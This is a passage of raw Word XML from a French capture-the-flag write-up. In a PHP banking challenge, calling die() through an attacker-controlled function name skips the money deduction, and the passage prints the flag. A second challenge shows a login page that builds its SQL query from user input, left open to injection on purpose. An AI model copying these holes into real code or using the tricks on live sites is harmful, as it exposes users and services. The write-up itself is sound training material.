        <w:t xml:space="preserve">, il fonctionnerait en local mais nous l’avons bloqué dans ce challenge pour éviter d’afficher des informations sur la configuration du serveur. En revanche on peut essayer un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">die </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>afin de stopper le flux d’execution de PHP.</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808000"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_GET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'do'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_GET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'to'</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000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>giveMoney</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_GET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'to'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>===</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>true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80"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Display</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>XXX</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>money</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>envoyé</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>execute</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>single</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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t>$do</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$_GET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"do"</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$do();</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80"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Remove</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>money</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removeMoney();</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rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">La fonction </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">die() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">est executée grâce à la magie de PHP, notons qu’une fonction inexistante telle que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whatever()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> aurait aussi interrompu le flux d’execution de PHP en soulevant une erreur. Cette interruption empêche ainsi le retrait d’argent du compte, il suffisait de spammer F5 pour remplir son compte et ensuite acheter le flag : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{c0ntrol_the_3l3ments_1s_th3_k3y}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc1636488011"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>WEB 100 - Super Query Login v2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Une nouvelle épreuve avec une injection SQL, la source du challenge est disponible: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00"/>
              </w:rPr>
              <w:t>&lt;!</w:t>
            </w:r>
            <w:r>
              <w:t>DOCTYPE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>html</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html</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head</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;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&lt;</w:t>
            </w:r>
            <w:r>
              <w:t>title</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>SQLi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:t>title</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head</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body</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p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>Bypass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>auth</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>!&lt;</w:t>
            </w:r>
            <w:r>
              <w:t>br</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;&lt;</w:t>
            </w:r>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>href</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"?viewsource"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>source</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;&lt;/</w:t>
            </w:r>
            <w:r>
              <w:t>p</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form</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>action</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>method</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"POST"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;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0000"/>
              </w:rPr>
              <w:t>Login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:t>input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"text"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"login"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;&lt;</w:t>
            </w:r>
            <w:r>
              <w:t>br</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;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0000"/>
              </w:rPr>
              <w:t>Passw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:t>input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"password"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"password"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;&lt;</w:t>
            </w:r>
            <w:r>
              <w:t>br</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&gt;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&lt;</w:t>
            </w:r>
            <w:r>
              <w:t>input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"submit"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"Connection"</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form</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php</w:t>
            </w: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0000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'login'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'password'</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require</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'config.php'</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$login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>stripslashes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(htmlentities(</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'login'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>],</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>ENT_QUOTES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$pass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>stripslashes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(htmlentities(</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'password'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>],</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>ENT_QUOTES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t>$sql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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web1_users</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>WHERE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>AND</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$pass</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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$result</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>mysql_query</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$sql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>die</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(mysql_error());</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000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>mysql_num_rows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$result</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>1</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$data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>mysql_fetch_array</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
